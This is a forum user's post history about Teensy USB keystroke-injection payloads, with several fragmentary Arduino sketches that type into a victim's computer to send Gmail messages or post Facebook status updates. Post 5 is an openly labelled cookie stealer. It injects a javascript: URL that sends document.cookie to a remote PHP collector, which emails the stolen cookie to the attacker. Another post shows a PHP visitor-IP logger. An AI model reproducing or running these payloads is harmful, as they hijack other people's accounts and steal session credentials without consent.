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Posts posted by vulg4h

  1. Could we make the teensy look like something else along with a keyboard and mouse? If so we could try to find a USB device with universal drivers that gets info FROM the pc and emulated it.

    I don't really think it's the drivers, but rather than the current software and hardware limitations. I'm not saying it'd be impossible, but it wouldn't be a weekend project. I didn't see something on the forums about data, such as keystrokes being forwarded to the Teensy.

  2. I wasn't aware that you could copy to the clipboard from php. If I get time I'll modify the script and code.

    I think what NanoyMaster is talking more along the lines of saving it to a file located on the server.

    For example, the following ip.php would save the content to ips.txt

    $data = "IP: " . $_SERVER['REMOTE_ADDR'] . "\n";
    $log_file = "ips.txt";
    $f = fopen($log_file, 'a');
    fwrite($f, $data);

  3. It's tab 8 times for me. Friends request add's one. Also, the escape search thing doesn't work on Chrome for OS X. Not sure about other browsers.

    *edit* This doesn't even work, all it's doing for me is bring up the start menu, and I don't feel like figuring out what is wrong right now. :/

    Yeah, you know the Windows + R combo?

    I incidentally made that CTRL + R, so uh... yeah.

    Also, the initial browser test was Chrome for OS X, and I just tested again,

    it seems to be working fine on my Firefox and Chrome.

    It's Apple-F -> "what's going" -> ESC -> DELETE -> DELETE -> "msg"

    Another edit, it was just tested on Chrome for Windows, everything seems to be peachy.

  4. So, I'm pretty sure this works.

    [ Windows ]

    void setup() {
      delay(3500); // initial delay
      Keyboard.print("start http://tinyurl.com/gmail-minipose"); // mail.google.com/mail/x/?v=b&eot=1&cs=b
      delay(6000); // delay for browser to load
      sendClearKeys(); delay(100);
      Keyboard.print("subject here");
      sendClearKeys(); delay(100);
      Keyboard.print("message here");
      sendClearKeys(); delay(100);
    void loop() { }
    void enter() {
    void sendClearKeys() {

  5. Note: In the code make "java script" one word.


    void setup() {
      delay(3500); // initial delay
      Keyboard.send_now(); delay(100);
      Keyboard.print("www.msn.com"); // site of cookie theft
      Keyboard.set_modifier(MODIFIERKEY_CTRL); // CTRL-L
      sendClearKeys(); delay(100);
      Keyboard.print("java script:document.location='http://site.com/savedatcookie.php?c='+escape(document.cookie)");
    void loop() { /* na-da */ }
    void sendClearKeys() {
    void enter() {


    mail("you@email.com", "Cookie Stealer - ".$_SERVER['HTTP_REFERER'], $_GET['c']); 

  6. Well TAB + ENTER on my facebook account is working.

    Just make sure you add a second (or so) delay between the two.

    Haha, yeah, I realized just before you posted that,

    check out my edit.

    I have this code done already for Windows and Mac OS X, I'll upload it later.

    Hint: Tab + Space, at http://m.facebook.com

    Ah, damn.

    But hmm, good thinking going towards the mobile approach.

  7. So a few things,

    • Hi, I'm vulg4h. I'm new here. How ya' doin'?
    • I can't test this because I don't have my Teensy yet, nor am I running Windows, atm.
    • I figured out that by doing a search of content within a textarea, and escaping the search puts you in typing mode of the textarea.
    • I love Rubber Ducky :D

    • Figured it out, should be working now.

    Lastly, here be thy code.

    The community's posts have helped dearly.

    void setup() {
      delay(3500); // initial delay
      delay(6000); // let browser load
      Keyboard.set_modifier(MODIFIERKEY_CTRL); // set browser to search-page
      sendClearKeys(); delay(100);
      Keyboard.print("What's on"); // search for "What's on"
      Keyboard.set_key1(KEY_ESC); // escape search
      sendClearKeys(); delay(100);
      sendClearKeys(); delay(100);
      sendClearKeys(); delay(100);
      Keyboard.print("This is an automated update from the future."); // new status content
    void loop() {
      // Maybe a flashing LED?
    void enter() {
    void sendClearKeys() {

    EDIT Boy, do I feel dumb. When I was going over the form to see how many tabs I need to submit it (I actually got up to 9), I somehow missed the first one. Code is working, now.

    EDIT2 Typo.

    EDIT3 Ha.... fixed the beginning. :|

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